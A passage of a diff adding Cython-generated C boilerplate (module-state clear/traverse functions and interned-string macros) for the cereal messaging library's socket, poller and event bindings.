Py_CLEAR(clear_module_state->__pyx_n_s_poll); + Py_CLEAR(clear_module_state->__pyx_n_s_prefix); + Py_CLEAR(clear_module_state->__pyx_n_s_prepare); + Py_CLEAR(clear_module_state->__pyx_n_s_print); + Py_CLEAR(clear_module_state->__pyx_n_s_ptr); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_vtable); + Py_CLEAR(clear_module_state->__pyx_n_s_qualname); + Py_CLEAR(clear_module_state->__pyx_n_s_r); + Py_CLEAR(clear_module_state->__pyx_n_s_receive); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_registerSocket); + Py_CLEAR(clear_module_state->__pyx_n_s_result); + Py_CLEAR(clear_module_state->__pyx_n_s_s); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_n_s_send); + Py_CLEAR(clear_module_state->__pyx_n_s_set); + Py_CLEAR(clear_module_state->__pyx_n_s_setTimeout); + Py_CLEAR(clear_module_state->__pyx_n_s_set_fake_prefix); + Py_CLEAR(clear_module_state->__pyx_n_s_set_name); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_socket); + Py_CLEAR(clear_module_state->__pyx_n_s_sockets); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_suffix); + Py_CLEAR(clear_module_state->__pyx_n_s_super); + Py_CLEAR(clear_module_state->__pyx_n_s_sys); + Py_CLEAR(clear_module_state->__pyx_n_s_sz); + Py_CLEAR(clear_module_state->__pyx_n_s_t); + Py_CLEAR(clear_module_state->__pyx_n_s_term); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_timeout); + Py_CLEAR(clear_module_state->__pyx_n_s_toggle_fake_events); + Py_CLEAR(clear_module_state->__pyx_kp_u_utf_8); + Py_CLEAR(clear_module_state->__pyx_n_s_wait); + Py_CLEAR(clear_module_state->__pyx_n_s_wait_for_one_event); + Py_CLEAR(clear_module_state->__pyx_kp_u_with); + Py_CLEAR(clear_module_state->__pyx_int_1); + Py_CLEAR(clear_module_state->__pyx_int_neg_1); + Py_CLEAR(clear_module_state->__pyx_tuple__4); + Py_CLEAR(clear_module_state->__pyx_tuple__6); + Py_CLEAR(clear_module_state->__pyx_tuple__8); + Py_CLEAR(clear_module_state->__pyx_tuple__9); + Py_CLEAR(clear_module_state->__pyx_tuple__11); + Py_CLEAR(clear_module_state->__pyx_tuple__15); + Py_CLEAR(clear_module_state->__pyx_tuple__17); + Py_CLEAR(clear_module_state->__pyx_tuple__20); + Py_CLEAR(clear_module_state->__pyx_tuple__22); + Py_CLEAR(clear_module_state->__pyx_tuple__25); + Py_CLEAR(clear_module_state->__pyx_tuple__32); + Py_CLEAR(clear_module_state->__pyx_tuple__34); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__41); + Py_CLEAR(clear_module_state->__pyx_tuple__43); + Py_CLEAR(clear_module_state->__pyx_tuple__46); + Py_CLEAR(clear_module_state->__pyx_tuple__48); + Py_CLEAR(clear_module_state->__pyx_codeobj__7); + Py_CLEAR(clear_module_state->__pyx_codeobj__10); + Py_CLEAR(clear_module_state->__pyx_codeobj__12); + Py_CLEAR(clear_module_state->__pyx_codeobj__13); + Py_CLEAR(clear_module_state->__pyx_codeobj__14); + Py_CLEAR(clear_module_state->__pyx_codeobj__16); + Py_CLEAR(clear_module_state->__pyx_codeobj__18); + Py_CLEAR(clear_module_state->__pyx_codeobj__19); + Py_CLEAR(clear_module_state->__pyx_codeobj__21); + Py_CLEAR(clear_module_state->__pyx_codeobj__23); + Py_CLEAR(clear_module_state->__pyx_codeobj__24); + Py_CLEAR(clear_module_state->__pyx_codeobj__26); + Py_CLEAR(clear_module_state->__pyx_codeobj__27); + Py_CLEAR(clear_module_state->__pyx_codeobj__28); + Py_CLEAR(clear_module_state->__pyx_codeobj__29); + Py_CLEAR(clear_module_state->__pyx_codeobj__30); + Py_CLEAR(clear_module_state->__pyx_codeobj__31); + Py_CLEAR(clear_module_state->__pyx_codeobj__33); + Py_CLEAR(clear_module_state->__pyx_codeobj__35); + Py_CLEAR(clear_module_state->__pyx_codeobj__36); + Py_CLEAR(clear_module_state->__pyx_codeobj__37); + Py_CLEAR(clear_module_state->__pyx_codeobj__39); + Py_CLEAR(clear_module_state->__pyx_codeobj__40); + Py_CLEAR(clear_module_state->__pyx_codeobj__42); + Py_CLEAR(clear_module_state->__pyx_codeobj__44); + Py_CLEAR(clear_module_state->__pyx_codeobj__45); + Py_CLEAR(clear_module_state->__pyx_codeobj__47); + Py_CLEAR(clear_module_state->__pyx_codeobj__49); + Py_CLEAR(clear_module_state->__pyx_codeobj__50); + Py_CLEAR(clear_module_state->__pyx_codeobj__51); + Py_CLEAR(clear_module_state->__pyx_codeobj__52); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_Event); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_Context); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_Poller); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket); + Py_VISIT(traverse_module_state->__pyx_kp_b_); + Py_VISIT(traverse_module_state->__pyx_kp_u_); + Py_VISIT(traverse_module_state->__pyx_kp_b_127_0_0_1); + Py_VISIT(traverse_module_state->__pyx_n_s_Context); + Py_VISIT(traverse_module_state->__pyx_n_s_Context___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Context___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Context_term); + Py_VISIT(traverse_module_state->__pyx_n_s_Event); + Py_VISIT(traverse_module_state->__pyx_n_s_Event___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Event___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Event_clear); + Py_VISIT(traverse_module_state->__pyx_n_s_Event_peek); + Py_VISIT(traverse_module_state->__pyx_n_s_Event_set); + Py_VISIT(traverse_module_state->__pyx_n_s_Event_wait); + Py_VISIT(traverse_module_state->__pyx_n_s_MessagingError); + Py_VISIT(traverse_module_state->__pyx_n_s_MessagingError___init); + Py_VISIT(traverse_module_state->__pyx_kp_u_Messaging_failure); + Py_VISIT(traverse_module_state->__pyx_n_s_MultiplePublishersError); + Py_VISIT(traverse_module_state->__pyx_kp_u_None); + Py_VISIT(traverse_module_state->__pyx_n_s_Poller); + Py_VISIT(traverse_module_state->__pyx_n_s_Poller___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Poller___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Poller_poll); + Py_VISIT(traverse_module_state->__pyx_n_s_Poller_registerSocket); + Py_VISIT(traverse_module_state->__pyx_n_s_PubSocket); + Py_VISIT(traverse_module_state->__pyx_n_s_PubSocket___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_PubSocket___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_PubSocket_all_readers_updated); + Py_VISIT(traverse_module_state->__pyx_n_s_PubSocket_connect); + Py_VISIT(traverse_module_state->__pyx_n_s_PubSocket_send); + Py_VISIT(traverse_module_state->__pyx_kp_u_SIGINT_received_exiting); + Py_VISIT(traverse_module_state->__pyx_n_s_SocketEventHandle); + Py_VISIT(traverse_module_state->__pyx_n_s_SocketEventHandle___reduce_cytho); + Py_VISIT(traverse_module_state->__pyx_n_s_SocketEventHandle___setstate_cyt); + Py_VISIT(traverse_module_state->__pyx_n_s_SubSocket); + Py_VISIT(traverse_module_state->__pyx_n_s_SubSocket___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_SubSocket___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_SubSocket_connect); + Py_VISIT(traverse_module_state->__pyx_n_s_SubSocket_receive); + Py_VISIT(traverse_module_state->__pyx_n_s_SubSocket_setTimeout); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_kp_u__2); + Py_VISIT(traverse_module_state->__pyx_n_s__5); + Py_VISIT(traverse_module_state->__pyx_n_s__53); + Py_VISIT(traverse_module_state->__pyx_n_s_address); + Py_VISIT(traverse_module_state->__pyx_n_s_all_readers_updated); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_cereal_messaging_messaging_pyx); + Py_VISIT(traverse_module_state->__pyx_kp_s_cereal_messaging_messaging_pyx_p); + Py_VISIT(traverse_module_state->__pyx_n_s_clear); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_conflate); + Py_VISIT(traverse_module_state->__pyx_n_s_connect); + Py_VISIT(traverse_module_state->__pyx_n_s_context); + Py_VISIT(traverse_module_state->__pyx_n_s_data); + Py_VISIT(traverse_module_state->__pyx_n_s_decode); + Py_VISIT(traverse_module_state->__pyx_n_s_delete_fake_prefix); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_doc); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_enabled); + Py_VISIT(traverse_module_state->__pyx_n_s_endpoint); + Py_VISIT(traverse_module_state->__pyx_n_s_event); + Py_VISIT(traverse_module_state->__pyx_n_s_events); + Py_VISIT(traverse_module_state->__pyx_n_s_exit); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_get_fake_prefix); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_identifier); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_init); + Py_VISIT(traverse_module_state->__pyx_n_s_init_subclass); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_items); + Py_VISIT(traverse_module_state->__pyx_n_s_length); + Py_VISIT(traverse_module_state->__pyx_n_s_m); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_message); + Py_VISIT(traverse_module_state->__pyx_n_s_metaclass); + Py_VISIT(traverse_module_state->__pyx_n_s_module); + Py_VISIT(traverse_module_state->__pyx_n_s_mro_entries); + Py_VISIT(traverse_module_state->__pyx_n_s_msg); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_VISIT(traverse_module_state->__pyx_n_s_non_blocking); + Py_VISIT(traverse_module_state->__pyx_n_s_override); + Py_VISIT(traverse_module_state->__pyx_n_s_peek); + Py_VISIT(traverse_module_state->__pyx_n_s_poll); + Py_VISIT(traverse_module_state->__pyx_n_s_prefix); + Py_VISIT(traverse_module_state->__pyx_n_s_prepare); + Py_VISIT(traverse_module_state->__pyx_n_s_print); + Py_VISIT(traverse_module_state->__pyx_n_s_ptr); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_vtable); + Py_VISIT(traverse_module_state->__pyx_n_s_qualname); + Py_VISIT(traverse_module_state->__pyx_n_s_r); + Py_VISIT(traverse_module_state->__pyx_n_s_receive); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_registerSocket); + Py_VISIT(traverse_module_state->__pyx_n_s_result); + Py_VISIT(traverse_module_state->__pyx_n_s_s); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_n_s_send); + Py_VISIT(traverse_module_state->__pyx_n_s_set); + Py_VISIT(traverse_module_state->__pyx_n_s_setTimeout); + Py_VISIT(traverse_module_state->__pyx_n_s_set_fake_prefix); + Py_VISIT(traverse_module_state->__pyx_n_s_set_name); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_socket); + Py_VISIT(traverse_module_state->__pyx_n_s_sockets); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_suffix); + Py_VISIT(traverse_module_state->__pyx_n_s_super); + Py_VISIT(traverse_module_state->__pyx_n_s_sys); + Py_VISIT(traverse_module_state->__pyx_n_s_sz); + Py_VISIT(traverse_module_state->__pyx_n_s_t); + Py_VISIT(traverse_module_state->__pyx_n_s_term); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_timeout); + Py_VISIT(traverse_module_state->__pyx_n_s_toggle_fake_events); + Py_VISIT(traverse_module_state->__pyx_kp_u_utf_8); + Py_VISIT(traverse_module_state->__pyx_n_s_wait); + Py_VISIT(traverse_module_state->__pyx_n_s_wait_for_one_event); + Py_VISIT(traverse_module_state->__pyx_kp_u_with); + Py_VISIT(traverse_module_state->__pyx_int_1); + Py_VISIT(traverse_module_state->__pyx_int_neg_1); + Py_VISIT(traverse_module_state->__pyx_tuple__4); + Py_VISIT(traverse_module_state->__pyx_tuple__6); + Py_VISIT(traverse_module_state->__pyx_tuple__8); + Py_VISIT(traverse_module_state->__pyx_tuple__9); + Py_VISIT(traverse_module_state->__pyx_tuple__11); + Py_VISIT(traverse_module_state->__pyx_tuple__15); + Py_VISIT(traverse_module_state->__pyx_tuple__17); + Py_VISIT(traverse_module_state->__pyx_tuple__20); + Py_VISIT(traverse_module_state->__pyx_tuple__22); + Py_VISIT(traverse_module_state->__pyx_tuple__25); + Py_VISIT(traverse_module_state->__pyx_tuple__32); + Py_VISIT(traverse_module_state->__pyx_tuple__34); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__41); + Py_VISIT(traverse_module_state->__pyx_tuple__43); + Py_VISIT(traverse_module_state->__pyx_tuple__46); + Py_VISIT(traverse_module_state->__pyx_tuple__48); + Py_VISIT(traverse_module_state->__pyx_codeobj__7); + Py_VISIT(traverse_module_state->__pyx_codeobj__10); + Py_VISIT(traverse_module_state->__pyx_codeobj__12); + Py_VISIT(traverse_module_state->__pyx_codeobj__13); + Py_VISIT(traverse_module_state->__pyx_codeobj__14); + Py_VISIT(traverse_module_state->__pyx_codeobj__16); + Py_VISIT(traverse_module_state->__pyx_codeobj__18); + Py_VISIT(traverse_module_state->__pyx_codeobj__19); + Py_VISIT(traverse_module_state->__pyx_codeobj__21); + Py_VISIT(traverse_module_state->__pyx_codeobj__23); + Py_VISIT(traverse_module_state->__pyx_codeobj__24); + Py_VISIT(traverse_module_state->__pyx_codeobj__26); + Py_VISIT(traverse_module_state->__pyx_codeobj__27); + Py_VISIT(traverse_module_state->__pyx_codeobj__28); + Py_VISIT(traverse_module_state->__pyx_codeobj__29); + Py_VISIT(traverse_module_state->__pyx_codeobj__30); + Py_VISIT(traverse_module_state->__pyx_codeobj__31); + Py_VISIT(traverse_module_state->__pyx_codeobj__33); + Py_VISIT(traverse_module_state->__pyx_codeobj__35); + Py_VISIT(traverse_module_state->__pyx_codeobj__36); + Py_VISIT(traverse_module_state->__pyx_codeobj__37); + Py_VISIT(traverse_module_state->__pyx_codeobj__39); + Py_VISIT(traverse_module_state->__pyx_codeobj__40); + Py_VISIT(traverse_module_state->__pyx_codeobj__42); + Py_VISIT(traverse_module_state->__pyx_codeobj__44); + Py_VISIT(traverse_module_state->__pyx_codeobj__45); + Py_VISIT(traverse_module_state->__pyx_codeobj__47); + Py_VISIT(traverse_module_state->__pyx_codeobj__49); + Py_VISIT(traverse_module_state->__pyx_codeobj__50); + Py_VISIT(traverse_module_state->__pyx_codeobj__51); + Py_VISIT(traverse_module_state->__pyx_codeobj__52); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_6cereal_9messaging_13messaging_pyx_Event __pyx_mstate_global->__pyx_type_6cereal_9messaging_13messaging_pyx_Event +#define __pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle __pyx_mstate_global->__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle +#define __pyx_type_6cereal_9messaging_13messaging_pyx_Context __pyx_mstate_global->__pyx_type_6cereal_9messaging_13messaging_pyx_Context +#define __pyx_type_6cereal_9messaging_13messaging_pyx_Poller __pyx_mstate_global->__pyx_type_6cereal_9messaging_13messaging_pyx_Poller +#define __pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket __pyx_mstate_global->__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket +#define __pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket __pyx_mstate_global->__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket +#endif +#define __pyx_ptype_6cereal_9messaging_13messaging_pyx_Event __pyx_mstate_global->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event +#define __pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle __pyx_mstate_global->__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle +#define __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context __pyx_mstate_global->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context +#define __pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller __pyx_mstate_global->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller +#define __pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket __pyx_mstate_global->__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket +#define __pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket __pyx_mstate_global->__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket +#define __pyx_kp_b_ __pyx_mstate_global->__pyx_kp_b_ +#define __pyx_kp_u_ __pyx_mstate_global->__pyx_kp_u_ +#define __pyx_kp_b_127_0_0_1 __pyx_mstate_global->__pyx_kp_b_127_0_0_1 +#define __pyx_n_s_Context __pyx_mstate_global->__pyx_n_s_Context +#define __pyx_n_s_Context___reduce_cython __pyx_mstate_global->__pyx_n_s_Context___reduce_cython +#define __pyx_n_s_Context___setstate_cython __pyx_mstate_global->__pyx_n_s_Context___setstate_cython +#define __pyx_n_s_Context_term __pyx_mstate_global->__pyx_n_s_Context_term +#define __pyx_n_s_Event __pyx_mstate_global->__pyx_n_s_Event +#define __pyx_n_s_Event___reduce_cython __pyx_mstate_global->__pyx_n_s_Event___reduce_cython +#define __pyx_n_s_Event___setstate_cython __pyx_mstate_global->__pyx_n_s_Event___setstate_cython +#define __pyx_n_s_Event_clear __pyx_mstate_global->__pyx_n_s_Event_clear +#define __pyx_n_s_Event_peek __pyx_mstate_global->__pyx_n_s_Event_peek +#define __pyx_n_s_Event_set __pyx_mstate_global->__pyx_n_s_Event_set +#define __pyx_n_s_Event_wait __pyx_mstate_global->__pyx_n_s_Event_wait +#define __pyx_n_s_MessagingError __pyx_mstate_global->__pyx_n_s_MessagingError +#define __pyx_n_s_MessagingError___init __pyx_mstate_global->__pyx_n_s_MessagingError___init +#define __pyx_kp_u_Messaging_failure __pyx_mstate_global->__pyx_kp_u_Messaging_failure +#define __pyx_n_s_MultiplePublishersError __pyx_mstate_global->__pyx_n_s_MultiplePublishersError +#define __pyx_kp_u_None __pyx_mstate_global->__pyx_kp_u_None +#define __pyx_n_s_Poller __pyx_mstate_global->__pyx_n_s_Poller +#define __pyx_n_s_Poller___reduce_cython __pyx_mstate_global->__pyx_n_s_Poller___reduce_cython +#define __pyx_n_s_Poller___setstate_cython __pyx_mstate_global->__pyx_n_s_Poller___setstate_cython +#define __pyx_n_s_Poller_poll __pyx_mstate_global->__pyx_n_s_Poller_poll +#define __pyx_n_s_Poller_registerSocket __pyx_mstate_global->__pyx_n_s_Poller_registerSocket +#define __pyx_n_s_PubSocket __pyx_mstate_global->__pyx_n_s_PubSocket +#define __pyx_n_s_PubSocket___reduce_cython __pyx_mstate_global->__pyx_n_s_PubSocket___reduce_cython +#define __pyx_n_s_PubSocket___setstate_cython __pyx_mstate_global->__pyx_n_s_PubSocket___setstate_cython +#define __pyx_n_s_PubSocket_all_readers_updated __pyx_mstate_global->__pyx_n_s_PubSocket_all_readers_updated +#define __pyx_n_s_PubSocket_connect __pyx_mstate_global->__pyx_n_s_PubSocket_connect +#define __pyx_n_s_PubSocket_send __pyx_mstate_global->__pyx_n_s_PubSocket_send +#define __pyx_kp_u_SIGINT_received_exiting __pyx_mstate_global->__pyx_kp_u_SIGINT_received_exiting +#define __pyx_n_s_SocketEventHandle __pyx_mstate_global->__pyx_n_s_SocketEventHandle +#define __pyx_n_s_SocketEventHandle___reduce_cytho __pyx_mstate_global->__pyx_n_s_SocketEventHandle___reduce_cytho +#define __pyx_n_s_SocketEventHandle___setstate_cyt __pyx_mstate_global->__pyx_n_s_SocketEventHandle___setstate_cyt +#define __pyx_n_s_SubSocket __pyx_mstate_global->__pyx_n_s_SubSocket +#define __pyx_n_s_SubSocket___reduce_cython __pyx_mstate_global->__pyx_n_s_SubSocket___reduce_cython +#define __pyx_n_s_SubSocket___setstate_cython __pyx_mstate_global->__pyx_n_s_SubSocket___setstate_cython +#define __pyx_n_s_SubSocket_connect __pyx_mstate_global->__pyx_n_s_SubSocket_connect +#define __pyx_n_s_SubSocket_receive __pyx_mstate_global->__pyx_n_s_SubSocket_receive +#define __pyx_n_s_SubSocket_setTimeout __pyx_mstate_global->__pyx_n_s_SubSocket_setTimeout +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_kp_u__2 __pyx_mstate_global->__pyx_kp_u__2 +#define __pyx_n_s__5 __pyx_mstate_global->__pyx_n_s__5 +#define __pyx_n_s__53 __pyx_mstate_global->__pyx_n_s__53 +#define __pyx_n_s_address __pyx_mstate_global->__pyx_n_s_address +#define __pyx_n_s_all_readers_updated __pyx_mstate_global->__pyx_n_s_all_readers_updated +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_cereal_messaging_messaging_pyx __pyx_mstate_global->__pyx_n_s_cereal_messaging_messaging_pyx +#define __pyx_kp_s_cereal_messaging_messaging_pyx_p __pyx_mstate_global->__pyx_kp_s_cereal_messaging_messaging_pyx_p +#define __pyx_n_s_clear __pyx_mstate_global->__pyx_n_s_clear +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_conflate __pyx_mstate_global->__pyx_n_s_conflate +#define __pyx_n_s_connect __pyx_mstate_global->__pyx_n_s_connect +#define __pyx_n_s_context __pyx_mstate_global->__pyx_n_s_context +#define __pyx_n_s_data __pyx_mstate_global->__pyx_n_s_data +#define __pyx_n_s_decode __pyx_mstate_global->__pyx_n_s_decode +#define __pyx_n_s_delete_fake_prefix __pyx_mstate_global->__pyx_n_s_delete_fake_prefix +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_doc __pyx_mstate_global->__pyx_n_s_doc +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_enabled __pyx_mstate_global->__pyx_n_s_enabled +#define __pyx_n_s_endpoint __pyx_mstate_global->__pyx_n_s_endpoint +#define __pyx_n_s_event __pyx_mstate_global->__pyx_n_s_event +#define __pyx_n_s_events __pyx_mstate_global->__pyx_n_s_events +#define __pyx_n_s_exit __pyx_mstate_global->__pyx_n_s_exit +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_get_fake_prefix __pyx_mstate_global->__pyx_n_s_get_fake_prefix +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_identifier __pyx_mstate_global->__pyx_n_s_identifier +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_init __pyx_mstate_global->__pyx_n_s_init +#define __pyx_n_s_init_subclass __pyx_mstate_global->__pyx_n_s_init_subclass +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_items __pyx_mstate_global->__pyx_n_s_items +#define __pyx_n_s_length __pyx_mstate_global->__pyx_n_s_length +#define __pyx_n_s_m __pyx_mstate_global->__pyx_n_s_m +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_message __pyx_mstate_global->__pyx_n_s_message +#define __pyx_n_s_metaclass __pyx_mstate_global->__pyx_n_s_metaclass +#define __pyx_n_s_module __pyx_mstate_global->__pyx_n_s_module +#define __pyx_n_s_mro_entries __pyx_mstate_global->__pyx_n_s_mro_entries +#define __pyx_n_s_msg __pyx_mstate_global->__pyx_n_s_msg +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_kp_s_no_default___reduce___due_to_non __pyx_mstate_global->__pyx_kp_s_no_default___reduce___due_to_non +#define __pyx_n_s_non_blocking __pyx_mstate_global->__pyx_n_s_non_blocking +#define __pyx_n_s_override __pyx_mstate_global->__pyx_n_s_override +#define __pyx_n_s_peek __pyx_mstate_global->__pyx_n_s_peek +#define __pyx_n_s_poll __pyx_mstate_global->__pyx_n_s_poll +#define __pyx_n_s_prefix __pyx_mstate_global->__pyx_n_s_prefix +#define __pyx_n_s_prepare __pyx_mstate_global->__pyx_n_s_prepare +#define __pyx_n_s_print __pyx_mstate_global->__pyx_n_s_print +#define 